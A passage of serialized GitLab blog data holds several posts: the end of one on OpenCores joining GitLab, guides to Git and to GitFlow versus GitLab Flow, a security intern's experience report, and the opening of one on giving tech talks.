_hardware_ (such as a Printed Circuit Board – PCB – or a packaged chip),\nand _firmware_ (a set of decoded and executed instructions for a microprocessor).\n\n### What is OpenCores?\n\nThe [OpenCores portal](https://opencores.org) hosts the source code for a\nmultitude of digital gateware projects. In its more than 20 years of web history, it has\nevolved into a platform that enables its user community to discover, showcase,\nand manage such projects, including revision control for [source code](/solutions/source-code-management/).\n\nThe target devices for gateware have historically been\n[FPGA](https://en.wikipedia.org/wiki/Field-programmable_gate_array) (Field\nProgrammable Gate Arrays) and\n[ASIC](https://en.wikipedia.org/wiki/Application-specific_integrated_circuit)s\n(Application Specific Integrated Circuits), which allow building a vast range\nof hardware digital electronics appliances. These are often described as\n[SoC](https://en.wikipedia.org/wiki/System_on_a_chip) (System on a Chip).\n\nIn recent years, the OpenCores portal has been particularly focused on hosting FPGA\napplications, with the intention to enlarge the pool of available cores based\non emerging hardware description methods, such as\n[HLS](https://en.wikipedia.org/wiki/High-level_synthesis) (High-level\nsynthesis).\n\nOpenCores is also the place where digital designers meet to showcase, promote,\nand talk about their passion and work. They do this through forums, news feeds,\nand much more!\n\n### Who maintains the OpenCores portal?\n\n[Oliscience](http://oliscience.nl/) (open logic interconnects science) act as\nthe stewards of the OpenCores community and its portal. Oliscience is an\ninitiative originated from the\n[CERN](/customers/cern/)-Nikhef Business Incubation\nCentre (CERN-BIC@Nikhef), and is [supported](https://opencores.org/partners) by\n[Nikhef](https://www.nikhef.nl/en/), the Dutch National Institute for Subatomic\nPhysics, and [ASTRON](https://www.astron.nl/), the Netherlands Institute for\nRadio Astronomy.\n\nAs part of the stewardship charter, Oliscience is committed to maintaining and\nsupporting the OpenCores portal. This mission involves globally promoting its\ncommunity, fostering the use of open standards and practices, actively\ndeveloping the portal infrastructure and content, and more.\nThe [Wishbone bus](https://en.wikipedia.org/wiki/Wishbone_(computer_bus)),\nused throughout OpenCores designs, is one of the most well-known examples.\n\n## Leading change and embracing the DevOps culture for Gateware development\n\n[Moore's law](https://en.wikipedia.org/wiki/Moore%27s_law) is slowing down, and\nthe semiconductor industry is starting to experience a new resurgence. With a\nwave of new opportunities arising, FPGA is one of the key technologies that\nplay a crucial role in the future of computing architectures.\n\nThe barrier to entry for becoming a gateway developer is fairly higher than learning a new programming language as a software developer. As\nsuch, the digital electronics industry is continually striving to simplify\nthe approach to programmable logic.\n\nOpen Source IP Cores play a significant role in this goal. They unlock a\nvast knowledge pool that enables new gateware developers to start hacking on\nnew projects straight away. They can use existing solutions to draw knowledge\nvery quickly.\n\nIP Cores strive for quality, and quality calls for a structured way to assess\nthe content of a code bundle. This is where Continuous Verification (CV) comes into\nplay.\n\nIn the context of programmable logic, CV is a\nworkflow in which Gateware defined in a [HDL](https://en.wikipedia.org/wiki/Hardware_description_language)\nruns against standardized testbenches and benchmarked to assess and rank its\nquality. Full coverage for test cases and failure corner cases is guaranteed.\n\n## Accelerating digital design with GitLab\n\nThe OpenCores community leaders have strong ties to [CERN](https://home.cern/)\nand the [European Space Agency](https://www.esa.int/). Both are leading\nresearch organizations committed to supporting their respective scientific\ncommunities, which use GitLab for internal development.\n\nBoth organizations and the electronics industry in general are particularly\ninterested in a better assessment of the quality of gateware products, as their\nusage in industrial and commercial applications continues to increase at an\naccelerated rate. When you launch a satellite into space, you can't just press\nthe reset button if there is a bug!\n\nWhile talking to those teams, and hearing the preliminary exploration of\nimplementing CV practices into gateware design, [GitLab's integral CI/CD\nfeatures](/solutions/continuous-integration/) seemed a natural fit to pioneer the adoption of a DevOps approach to\ndigital design.\n\nSource control was also a feature that would enable engineers to share and\ncollaborate on their code in the public space. In summary, the benefits of a\nsingle application for the entire DevOps cycle, with the ultimate goal of\nreducing the gateware design cycle time made the decision easy.\n\nThe next objective for the OpenCores team is to implement a CV process in the\nOpenCores portal, starting with FPGA and until ASICs. It's an ambitious one,\nwhich requires ambitious partners.\n\nAndrea Borga, Oliscience CEO mentions:\n> we have a very strong scientific background, and we love to make experiments…\n> all the time! Exploring new ideas, and striving for impeccable execution are\n> embedded in our engineering way of thinking. You need innovative and\n> ambitious partners to achieve equally innovative and ambitious goals. This\n> is why we do what we do, and why we firmly believe GitLab's vision and spirit\n> strongly align with our own. This is how we chose to go with them.\n\nGitLab is thrilled to start working with the OpenCores team, to contribute to\nthat goal and welcoming them to a community that leading Open Source projects\nsuch as Drupal, GNOME, KDE, Debian, Freedesktop and many more are already a\npart of.\n\n[Cover image](https://www.flickr.com/photos/130561288@N04/39116042294/) by\n[Fritzchens Fritz](https://www.flickr.com/photos/130561288@N04/),\nlicensed under [CC0 1.0](https://creativecommons.org/publicdomain/zero/1.0/)\n{: .note}\n",[685,109,9,930,267],{"slug":5213,"featured":6,"template":689},"welcoming-opencores-to-gitlab","content:en-us:blog:welcoming-opencores-to-gitlab.yml","Welcoming Opencores To Gitlab","en-us/blog/welcoming-opencores-to-gitlab.yml","en-us/blog/welcoming-opencores-to-gitlab",{"_path":5219,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5220,"content":5226,"config":5231,"_id":5233,"_type":14,"title":5234,"_source":16,"_file":5235,"_stem":5236,"_extension":19},"/en-us/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality",{"title":5221,"description":5222,"ogTitle":5221,"ogDescription":5222,"noIndex":6,"ogImage":5223,"ogUrl":5224,"ogSiteName":673,"ogType":674,"canonicalUrls":5224,"schema":5225},"What is Git? The ultimate guide to Git's role and functionality","Want to complete your projects with Git? Discover all of Git's benefits and features in our comprehensive guide.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673991/Blog/Hero%20Images/Git.jpg","https://about.gitlab.com/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What is Git? The ultimate guide to Git's role and functionality\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2024-11-14\",\n      }",{"title":5221,"description":5222,"authors":5227,"heroImage":5223,"date":5228,"body":5229,"category":10,"tags":5230},[970],"2024-11-14","Git is a must-have tool in the world of modern software development. In this comprehensive guide, we explain in detail what the Git tool is, its role in source code versioning, and how it works. Whether you're a beginner or an expert, this guide will give you a deep understanding of Git and its many features.\n\n## What is Git?\n\nGit is a source control tool that has quickly become a must-have in the software development ecosystem. Git's ability to meticulously track project changes makes it an essential tool for developers aiming to efficiently manage their projects. Therefore, mastering Git has become a vital skill for anyone aiming to excel in the field of software development.\n\n### What is version control?\n\n[Version control](https://about.gitlab.com/topics/version-control/what-is-git-version-control/) enables you to track changes to a software's source code. Thus, a software's delivered version consists of a set of specific versions of each of its components and source code files. For example, an icon might have only been changed twice, while a code file might have undergone several dozen changes over time.\n\n## What are Git's features?\n\nIn development, maintaining rigorous management of changes to a software's source code is important. Without this, ensuring the consistency and reliability of development teams' work is impossible. Fine-tuned change management can also make it easier to identify the source of a problem. Similarly, it reduces the risk of conflicts and file overwriting. Indeed, Git facilitates and streamlines software versioning precisely for this purpose.\n\nTo better understand Git and how it works, below we've outlined some of the key features that make it easy to optimize source code management as well as collaboration across teams.\n\n### Visualization of your project history\n\nIn the software development ecosystem, [the commit history](https://about.gitlab.com/blog/keeping-git-commit-history-clean/) is a core pillar for tracking project progress on Git. That's why Git offers developers a detailed history of all changes made to the   \nsource code.\n\nFor each new commit, the following are recorded:\n\n* specific changes made to project files\n* an explanatory message from the developer who made the change\n\nThese elements help improve the development team's communication and mission, allowing them to more quickly understand the ins and outs of each change made to the code.\n\nIn addition to monitoring project developments, this history allows you to go back if necessary, cancel part of the changes or, conversely, fetch only part of the changes from one branch to another. This function therefore plays an essential role in maintaining the transparency, consistency, and quality of a project's source code in Git, as well as collaboration within the development team and operational efficiency to solve problems.\n\nCheck out our tutorial on [how to create your first Git commit](https://docs.gitlab.com/ee/tutorials/make_first_git_commit/).\n\n### Greater autonomy for teams\n\nAnother essential feature of the Git tool is [distributed development](https://git-scm.com/about/distributed). Thanks to its decentralized structure, Git allows development teams to work simultaneously on the same project. Each team member has their own copy of the project, where each of their changes can be versioned. This allows them to work autonomously on specific features while reducing conflict or overwriting risks. This approach offers great flexibility for developers who can then explore different ideas or experiment with new features without interfering with their colleagues' work.\n\nDistributed development also enhances resilience to server failures. Thus, even in the event of a failure, each person has a copy on which they can continue to work offline. Changes can then be synchronized once the server is available again, thereby reducing the risk of work disruption for development teams and update constraints for operational teams.\n\n### Optimizing development workflows\n\nOne of Git's most powerful features is the ability to [manage branches and their mergers (branching and merging)](https://git-scm.com/about/branching-and-merging). These allow teams to work in parallel in a collaborative and organized way. Each new code addition or bug fix can be independently developed and tested to ensure reliability. Developers can then simply merge changes into the project's main branch.\n\nBy adopting this approach, teams can track code evolution, collaborate easily and efficiently, reduce conflicts between different versions, and ensure continuous integration of developed features.\n\nUsing these two features, teams can develop projects continuously and in an agile manner while regularly deploying new code versions. This practice greatly facilitates change management while reducing the risk of errors.\n\n## What are Git's benefits?\n\nTo thoroughly understand Git, it's important to fully recognize the benefits it offers to your development teams:\n\n* **Decentralized version management:** With Git, each developer has a complete copy of the project history, allowing them to work independently.  \n* **A tool designed around security:** Unlike other source control tools, Git was designed from the outset to ensure the integrity of all elements of the repository with a cryptographic Secure Hash Algorithm (SHA1 and [SHA-256](https://about.gitlab.com/blog/gitlab-now-supports-sha256-repositories/) to date). This algorithm aims to protect the project's code and history from any modifications, whether malicious or not. In addition, each commit (creation of a new version) can be automatically signed (GPG) to ensure change traceability. This makes Git a particularly safe and secure tool, which guarantees the integrity and authenticity of your source code and its history.  \n* **A fast and effective tool:** The Git tool has been designed to maximize efficiency during development. Its speed allows developers to perform complex operations, such as commits, branching, and merging, in minimal time, even on large code bases. It also ensures a minimum fingerprint on the hard disk and during network exchanges. This efficiency then translates into rapid response times during backups, consultations, and project history changes.  \n* **Greater work flexibility:** Git supports a wide variety of development workflows. Whether you prefer centralized development models or more linear approaches, Git adapts easily. This ability to manage different workflows provides teams with numerous options for how they work.  \n* **Ease of integration:** Git excels in its ability to integrate with a wide array of existing development tools and platforms. The breadth of this compatibility allows teams to manage their projects more effectively by leveraging the best DevSecOps tools and practices.  \n* **A widely followed open-source project:** Another significant benefit of Git is that it's an open-source project supported by a dynamic and dedicated community which ensures its constant improvement. This active participation from individuals and companies in the Git community ensures the regular addition of new features and improvements through continuous updates.\n\n## What are Git's main commands?\n\nThe open-source Git project offers a wide variety of commands to make teamwork easier.  \nHere are some of the most commonly used commands.\n\n* **git init:** Initialize a new Git repository.  \n* **git clone \\[url\\]:** Clone an existing repository.  \n* **git add \\[file\\]:** Add a file to the index.  \n* **git commit:** Validate changes made.  \n* **git commit \\-m \"message\":** Validate changes with a message.  \n* **git status:** View the status of files in the working directory.  \n* **git push:** Send changes to remote repository.  \n* **git pull:** Fetch changes from the remote repository and merge them with the local repository.\n\nWhile these commands are essential to getting started with Git, it's important to note that there are plenty of other commands. See the [list of Git commands](https://git-scm.com/docs).\n\n## Git and GitLab\n\nGitLab is a collaborative open-source development platform covering all stages of the DevSecOps lifecycle and providing a Git server for efficient team collaboration.\n\nBeyond source code management, GitLab offers a complete suite enabling continuous integration and distribution, deliverables management, security and incident management, as well as all associated traceability, real-time task planning and tracking, deployment monitoring, software versioning, and the associated document space.\n\n## Git FAQs\n\n### Why use Git?\n\nGit is all about efficiency. Git's decentralized system based on branching and merging features allows development teams to work on the same project without interfering with others' work or, more importantly, creating version conflicts.\n\n### Is Git software?\n\nGit is an open-source project. Therefore, it's free and open to everyone. However, you need to [install Git](https://docs.gitlab.com/ee/topics/git/how_to_install_git/) on your device before you can start working.\n\n### What is a branch in Git?\n\nIn Git, a branch is a pointer to a change history. Thus, each main branch points to the last commit performed on it. It is therefore possible to have many parallel branches, each with its own history but the same root.\n\n### What is a commit?\n\nIn Git, a commit is a record of changes to a software's source code. Each commit is accompanied by an explanatory message that traces the history of all changes. This makes project tracking easier, and there's always the option to revert to earlier, functional versions if there's a problem.\n\n### What is the benefit of branches in Git?\n\nDeveloping features in branches allows developers to work simultaneously on several distinct features. In addition, this avoids compromising the main branch with unstable code. Moreover, implementing branches in Git is significantly more lightweight than in other version control systems.",[751,867,9],{"slug":5232,"featured":6,"template":689},"what-is-git-the-ultimate-guide-to-gits-role-and-functionality","content:en-us:blog:what-is-git-the-ultimate-guide-to-gits-role-and-functionality.yml","What Is Git The Ultimate Guide To Gits Role And Functionality","en-us/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality.yml","en-us/blog/what-is-git-the-ultimate-guide-to-gits-role-and-functionality",{"_path":5238,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5239,"content":5245,"config":5250,"_id":5252,"_type":14,"title":5253,"_source":16,"_file":5254,"_stem":5255,"_extension":19},"/en-us/blog/what-is-gitflow",{"title":5240,"description":5241,"ogTitle":5240,"ogDescription":5241,"noIndex":6,"ogImage":5242,"ogUrl":5243,"ogSiteName":673,"ogType":674,"canonicalUrls":5243,"schema":5244},"What is GitFlow?","This article introduces the differences between GitFlow and GitLab Flow, explains what GitFlow is, how it works, its benefits, and answers frequently asked questions.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659838/Blog/Hero%20Images/AdobeStock_662057734.jpg","https://about.gitlab.com/blog/what-is-gitflow","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What is GitFlow?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab Team\"}],\n        \"datePublished\": \"2024-09-27\",\n      }",{"title":5240,"description":5241,"authors":5246,"heroImage":5242,"date":5247,"body":5248,"category":10,"tags":5249},[3594],"2024-09-27","In GitFlow, developers create a separate \"`develop`\" (for development) branch in addition to the \"`main`\" (for operation) branch and set it as the default. However, with [GitLab Flow](https://about.gitlab.comtopics/version-control/what-is-gitlab-flow/), work can begin directly on the `main` branch. GitLab Flow incorporates pre-production branches, allowing for bug fixes before merging changes into the `main` branch and deploying to production. For example, teams can add as many pre-production branches as needed, such as flowing from `main` to test, test to acceptance, or acceptance to production. \n\nIn this article, you'll learn the differences between GitFlow and GitLab, what GitFlow is, how it works, its benefits, and get answers to frequently asked questions. \n\n## Table of contents\n- [What is GitFlow](#what-is-gitflow)\n- [How GitFlow works](#how-gitflow-works)\n- [How GitFlow and GitLab Flow differ](#how-gitflow-and-gitlab-flow-differ)\n- [GitFlow's workflow](#gitflow's-workflow)\n- [GitLab Flow's workflow](#gitlab-flow's-workflow)\n- [Benefits of using GitFlow and its features](#benefits-of-using-gitflow-and-its-features)\n- [GitFlow example](#gitflow-example)\n- [GitLab Flow and GitFlow FAQ ](#gitlab-flow-and-gitflow-faq)\n\n## What is GitFlow\n\nGitFlow is a Git workflow designed for managing branches in Git (a distributed version control system); it serves as a branching model for Git repositories. Created to simplify complex software release management, it was introduced by Vincent Driessen in 2010. It is particularly popular among large teams. \n\n## How GitFlow works\n\nCompared to trunk-based development, GitFlow features persistent branches and tends to involve larger commits. GitFlow can be used for projects with scheduled release cycles and aligns with [DevOps](https://about.gitlab.com/solutions/devops-platform/) best practices for continuous delivery. GitFlow provides a structured workflow where branches are defined for specific purposes, such as creating feature branches off the `develop` branch and the 'main' branch, preparing `release` branches, and eventually merging into `main`. This structure makes it easier for teams to understand where changes should be integrated within their development pipeline. \n\n## How GitFlow and GitLab Flow differ\n\nGitFlow is a Git branching model that utilizes multiple primary branches in addition to feature branches. [GitLab Flow](https://about.gitlab.com/topics/version-control/what-is-gitlab-flow/) aims to address some of the complexities inherent in GitFlow, enabling team members to work more efficiently. Let's examine the workflow differences in more detail. \n\n### GitFlow's workflow\n\nThe GitFlow workflow involves the following five types of branches: \n\n1. main\n2. develop \n3. feature\n4. release \n5. hotfix\n\nWhen using GitFlow for code development, you work with the main branch and various supporting branches. There are two primary long-lived branches: the main branch for production-ready code, and the develop branch for integrating source code under development. Codes are stabilized in the `develop` branch, prepared to be released, and then merged into the main branch when ready. Supporting branches, such as feature, release, and hotfix branches, are created to handle specific development tasks. \n\n### GitLab Flow's workflow\n\nGitLab Flow streamlines development by preventing the overhead associated with releases, tagging, merging, and more. \n\nGitLab Flow is a simplified alternative to GitFlow, combining feature-driven development with issue tracking capabilities. Using GitLab Flow enables simple, straightforward, and efficient workflows. GitLab Flow incorporates best practices to help software development teams release features smoothly. \n\nGitLab Flow is the workflow used in GitLab's own development. It involves branches such as the `main` branch; a pre-release testing branch, `pre-production`; a branch for managing released code, `production`; and branches for feature development or bug fixes like `feature``hotfix`. Teams can add as many pre-production branches as they need. For example, creating flows such as from `main` to test, from test to approval, and from approval to production. \n\nWhile teams create feature branches, they also manage production branches. Once the main branch is ready for deployment, it will be merged into the production branch and released. GitLab Flow can also be utilized with release branches. Teams needing public APIs must manage different versions; GitLab Flow facilitates this by allowing the creation of individually manageable branches like `v1` and `v2`, making it convenient to revert to `v1` if bugs are detected during code review. \n\n## Benefits of using GitFlow and its features\n\n### 1: Rapid handling of bug fixes\n\nOne benefit of using GitFlow is the ability to quickly handle bug fixes in the production environment. GitFlow is employed as a Git (distributed version control system) workflow, particularly by large teams engaged in complex software development. \n\n### 2: Ensured testing\n\nWhen releasing software from a release branch, you can allocate time for users to test in a staging environment. This can occur independently of ongoing code development. Furthermore, as commits flow downstream through different stages, it helps ensure testing across all relevant environments. \n\n### 3: Streamlined software development process\n\nUsing GitFlow allows you to leverage Git to its full potential. This, in turn, helps streamline the software development process. \n\n### 4: More efficient collaboration, conflict resolution, and continuous delivery\n\nImplementing GitFlow enhances collaboration efficiency. Merge conflicts can be resolved quickly, enabling continuous delivery. \n\n## GitFlow example\nThe diagram below illustrates an example configuration of GitFlow. It should help clarify the overall flow, including the different branches and their structure.  \n\n![GitFlow example](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673714/Blog/Content%20Images/AdobeStock_569852816.jpg)\n\n## GitLab Flow and GitFlow FAQ \n\n### Q: What is Git Feature Flow? \n\nA: It is one of the proposed development workflows that utilize Git. Git Feature Flow is suitable for handling simpler development requirements. \n\n### Q: Is GitLab Flow worth using? \n\nA: Yes. GitLab Flow reduces the overhead associated with activities like releasing, tagging, and merging. These can be common issues encountered in other Git workflows. For more details, see [these GitLab Flow best practices](https://about.gitlab.com/topics/version-control/what-are-gitlab-flow-best-practices/). \n\n### Q: How should I choose between GitLab Flow and GitFlow? \n\nA: Git Flow, due to its structure, is well-suited for large projects with clearly defined development stages. GitLab Flow, being more agile, is better suited for projects that prioritize continuous delivery and rapid releases. \n\n## Get started with GitLab\n\nStart your [free, 60-day trial of GitLab Ultimate and GitLab Duo Enterprise](https://about.gitlab.com/free-trial/) today!\n",[751,9],{"slug":5251,"featured":6,"template":689},"what-is-gitflow","content:en-us:blog:what-is-gitflow.yml","What Is Gitflow","en-us/blog/what-is-gitflow.yml","en-us/blog/what-is-gitflow",{"_path":5257,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5258,"content":5264,"config":5270,"_id":5272,"_type":14,"title":5273,"_source":16,"_file":5274,"_stem":5275,"_extension":19},"/en-us/blog/what-its-like-to-intern-in-gitlab-security",{"title":5259,"description":5260,"ogTitle":5259,"ogDescription":5260,"noIndex":6,"ogImage":5261,"ogUrl":5262,"ogSiteName":673,"ogType":674,"canonicalUrls":5262,"schema":5263},"What it's like to intern on the GitLab Security team","I spent 16 weeks interning across the GitLab security department and here’s what I learned","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672427/Blog/Hero%20Images/cgower_desk.jpg","https://about.gitlab.com/blog/what-its-like-to-intern-in-gitlab-security","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What it's like to intern on the GitLab Security team\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Juliet Wanjohi\"}],\n        \"datePublished\": \"2020-08-13\",\n      }",{"title":5259,"description":5260,"authors":5265,"heroImage":5261,"date":5267,"body":5268,"category":951,"tags":5269},[5266],"Juliet Wanjohi","2020-08-13","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nBetween May and August 2020, I had the wonderful opportunity of being part of the [Engineering Internship Pilot Program](/handbook/engineering/internships/). Specifically, I was an intern in the [Security department](/handbook/security/) at GitLab. This was my first [all-remote](/company/culture/all-remote/guide/) role, and I must say it was an extremely worthwhile experience. 😄\n\nGetting to work remotely at GitLab offered a lot of flexibility as I could choose my own working hours where I was most productive, and at the same time learn how to become a [manager of one](https://handbook.gitlab.com/handbook/values/#managers-of-one) in my day-to-day tasks. Additionally, due to the team being fully-distributed, I was able to meet and collaborate with a diverse group of individuals from all over the world. The team was very helpful each step of the way, and I could always reach out to my manager and mentors if I required any assistance. What surprised me the most was that I was able to have chats with senior leadership in GitLab, which I think is great since one may not have such opportunities in a normal office setup.\n\nThe internship enabled me to grow exponentially in different aspects: technical skills, accountability, and within the [GitLab values](https://handbook.gitlab.com/handbook/values/) of collaboration, efficiency and transparency to name but a few areas. \n\n## Cross-functional exposure and understanding\nA goal for my internship experience was to gain exposure to different security teams and develop an understanding of the key functions performed to ensure and enhance the overall security posture of GitLab. \n \nGitLab’s [Security department](/handbook/security/) is organized around three key tenets that drive the structure and activities of the group, including: secure the product, protect the company and assure the customer. I had the opportunity to work across each of these teams and want to share some key learnings from each rotation.\n\n### Securing the product\nThis team works closely with engineering and product teams to ensure that all GitLab products securely handle the customer data with which we are entrusted. I was able to work with the teams in the [Application Security](/handbook/security/security-engineering/application-security/), [Security Research](/handbook/security/#security-research) and [Security Automation](/handbook/security/security-engineering/automation/) functions to gain a deeper appreciation of how they ensure all aspects of GitLab exposed to customers or that host customer data are held to the highest security standards.\n\nWorking with security engineers on our [Application Security](/handbook/security/security-engineering/application-security/) team, I had the chance to contribute directly to GitLab the product! 🎉  This involved [improving the current path traversal checks](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/33114) on user controlled file names and file paths. It was a collaborative effort between myself and other engineers through multiple code reviews and iterations that also helped me to sharpen my skills in coding with Ruby and produce well-written tests. Furthermore, I was able to triage a couple of reports in [GitLab’s bug bounty program](https://hackerone.com/gitlab). This enabled me to learn more about vulnerability identification and how the team handles bug reports from the first stage, where a bug is reported, to the last stage, where a security release is created to fix the bug. By reviewing past issues that the Application Security team had handled, I was able to develop a better understanding of the [security fix process](/handbook/security/#vulnerability-reports-and-hackerone). With respect to ‘shift left’, this enabled me to see how the team collaborates with other engineering and product teams to integrate security early in the development process by carrying out code security reviews on features.\n\nIn addition, I had pairing sessions with members of the [Security Research](/handbook/security/security-engineering/security-research/) team where I was able to learn about different bug-hunting approaches and current security vulnerability research areas being undertaken such as SAST/DAST tooling and dependency scanning. We also worked together to solve a couple of challenges from the 2020 GitLab capture the flag (CTF). Read about the CTF in [“How to play GitLab's Capture the Flag at home”](/blog/how-to-play-gitlab-ctf-at-home/) and try your hand!\n\nThe time I spent working with the [Security Automation](/handbook/security/security-engineering/automation/) team exposed me to the SaaS infrastructure that GitLab relies on with a special emphasis on Google Cloud Platform (GCP). I collaborated with another security engineer to design and implement automation efforts to assist with the management of anomalous resources in GCP, and further assist with the triage process of the reports on these resources.  Through [coffee chats](/company/culture/all-remote/informal-communication/#coffee-chats) with the rest of this team, I was able to gain an understanding of the current Security Automation initiatives surrounding the building of tools and services geared towards increasing efficiency and assisting other security teams in their work.\n\n### Protect the company\nThis group is responsible for “[shoring up and maintaining the security posture of GitLab.com to ensure enterprise-level security is in place to protect our new and existing customers](/handbook/security/#protect-the-company)” and I was fortunate to work across all three functional areas within this group: [Security Incident Response Team](/handbook/security/#sirt---security-incident-response-team-former-security-operations) (SIRT), [Trust and Safety](/handbook/security/#trust--safety) team and [Red Team](/handbook/security/threat-management/red-team/).\n\nWorking with the SIRT team was exciting as I got to learn how security incidents are managed by shadowing the security engineers on-call. This can be a very time-sensitive and fast-paced operation as incidents need to be handled quickly, but at the same time, precisely to avoid any further escalations. Additionally, I had the privilege to work with the team to help create detection rules using Python; I particularly enjoyed this since one of my favorite aspects of software engineering is coding! This gave me insight into how we can proactively detect threats in our environment and design appropriate response approaches.\n\nThe [Trust and Safety](/handbook/security/#trust--safety) team’s main objective is to ensure that GitLab.com is not abused by malicious users. I was able to contribute to this team’s efforts by developing an algorithm that could help to detect [file obfuscation](https://attack.mitre.org/techniques/T1027/), which is a trending abuse methodology used to hide malicious content. This was particularly interesting as we got to leverage the power of machine learning in the security domain. More about this project can be seen further down in this post!\n\nGitLab’s Red Team actively examines the security posture of the organization by carrying out exercises to establish threat models and escalate any security gaps that may be discovered during testing. My time spent on this team gave me the opportunity to get the team members’ perspectives on what it takes to be a ‘Red Teamer’ and how they support GitLab’s value of transparency in their day-to-day work. An interesting project that I was able to contribute to involved research on a machine learning algorithm that can help with secret scanning in GitLab repositories. This proof-of-concept was geared towards reducing the large number of false positives in the current state-of-the-art secret searching tools.\n\n### Assure the customer\nThis sub-department focuses on the mission to [“provide assurance to GitLab customers that any data shared with GitLab will be kept safe and our customer's privacy will be respected”](/handbook/security/security-assurance/) and includes the functions and subteams of [Field Security](/handbook/security/security-assurance/field-security/) and [Security Compliance](/handbook/security/security-assurance/security-compliance/).\n\nInterning within this group was a unique experience for me as I had not yet had the chance to try my hand at a [security analyst](https://handbook.gitlab.com/job-families/security/security-analyst/) role. Through this engagement, I gained visibility into how risk and compliance relate to the bigger security picture and became familiar with the various security compliance certifications and their relationship to the internal [GitLab Control Framework](/handbook/security/security-assurance/security-compliance/sec-controls.html). Specifically, I was able to look at the SOC2 industry standard and help to test controls such as data management, with respect to current vendor security review assessments.\n\n## A deeper dive: machine learning in security\n\nAs part of my internship here, I had the opportunity to focus more deeply on an area of specific interest to me: machine learning. GitLab is actively pursuing novel ways of integrating machine learning into its overall security model. Machine learning can offer multiple benefits in security-based use cases including detection of malicious activity and automation of repetitive security tasks. \n\nAs part of the anti-abuse efforts ongoing at GitLab, senior security engineer in Automation, [Melissa Rodriguez](https://gitlab.com/melissar) and I worked on creating an algorithm that could help to detect obfuscation in certain files. This involved research and learning how to build models that could find patterns in text, and using this to correctly classify regular files versus obfuscated files. I'm proud to say the algorithm I helped to develop with Melissa is going to be used in the detection of abusive activities such as cryptomining, where attackers tend to obfuscate their mining configurations.\n\nMachine learning is a fast-growing trend that has a myriad of applications in the security space, and it is important to consider how to take advantage of it to improve overall security posture and better protect customers.\n\n## Interested in joining GitLab?\nIf you would like to be a part of this amazing team and get to contribute to the GitLab product while enjoying the perks of all-remote, check out the [career opportunities](/jobs/) page and join our [talent community](https://boards.greenhouse.io/gitlab/jobs/4700367002?gh_src=d865c64f2us). You can also learn more about GitLab’s [culture](/company/culture/) and [values](https://handbook.gitlab.com/handbook/values/) in order to get an understanding of what it might be like to work here!\n\n\nCover image by [Christopher Gower](https://unsplash.com/@cgower) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[865,803,9],{"slug":5271,"featured":6,"template":689},"what-its-like-to-intern-in-gitlab-security","content:en-us:blog:what-its-like-to-intern-in-gitlab-security.yml","What Its Like To Intern In Gitlab Security","en-us/blog/what-its-like-to-intern-in-gitlab-security.yml","en-us/blog/what-its-like-to-intern-in-gitlab-security",{"_path":5277,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5278,"content":5284,"config":5289,"_id":5291,"_type":14,"title":5292,"_source":16,"_file":5293,"_stem":5294,"_extension":19},"/en-us/blog/what-makes-a-great-tech-talk",{"title":5279,"description":5280,"ogTitle":5279,"ogDescription":5280,"noIndex":6,"ogImage":5281,"ogUrl":5282,"ogSiteName":673,"ogType":674,"canonicalUrls":5282,"schema":5283},"What makes a great tech talk?","I've compiled some of my favorite tech talks to find out what makes them great.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670658/Blog/Hero%20Images/data-startup-cognitive-logic-talks-migrating-to-gitlab.jpg","https://about.gitlab.com/blog/what-makes-a-great-tech-talk","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What makes a great tech talk?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brendan O'Leary\"}],\n        \"datePublished\": \"2022-10-04\",\n      }",{"title":5279,"description":5280,"authors":5285,"heroImage":5281,"date":5286,"body":5287,"category":682,"tags":5288},[1074],"2022-10-04","\n\nAs someone who spends a reasonable amount of time writing, rehearsing, and giving tech talks, I often find folks new to speaking about tech asking me: how do you do it? How do you know that you will be able to write and give an excellent tech talk?\n\nThe simple answer is: I don't know. An excellent tech talk isn't definable and solvable like an engineering problem. It's part tech, part passion, part storytelling, and part luck. But in thinking about speakers and talks that I've looked up to throughout the years, I believe that I've found a few key ingredients in any tech talk that I've seen and would consider \"great.\"  In reviewing these, I actually came to appreciate what I somewhat already knew: the \"tech\" part of the talk is probably the least important part of a great tech talk. Yet, as professionals, that is what we get wrapped around. And it is what worries us when writing a speech. The best demo ever - that's what will save my talk! But in the end, it's not just the tech content that counts, so let's look at the five critical ingredients for a great tech talk:\n\n- Story and narrative\n- Passion\n- Connection to the audience\n- Balance\n- Call to action\n\nFor each ingredient, I've included a talk that best illustrates that principle and a link to the talk. As an aside, every moderately good talk I've ever written was inspired while listening to or after hearing a great talk from one of these amazing technologists. Remember: [good artists copy, great artists steal](https://www.youtube.com/watch?v=a6jeZ7m0ycw).\n\n## Story and narrative\n\n[Keynote: Reflections](https://www.youtube.com/watch?v=jiaLsxjBeOQ): **Kelsey Hightower, KubeCon CloudNativeCon North America 2019**\n\nStories are how humans have always learned and taught each other. From the earliest stories around campfires to teach about the dangers of predators or the ways to find food to the modern world where we are bombarded by stories that we now call 'marketing' - stories have always played a pivotal role in learning and teaching.\n\nAnd so, without a story, your audience is already lost. You can show some of the most incredible technology, a fantastic demo, and wow people with statistics...but if there is no connection to the real world - to their lives - then it 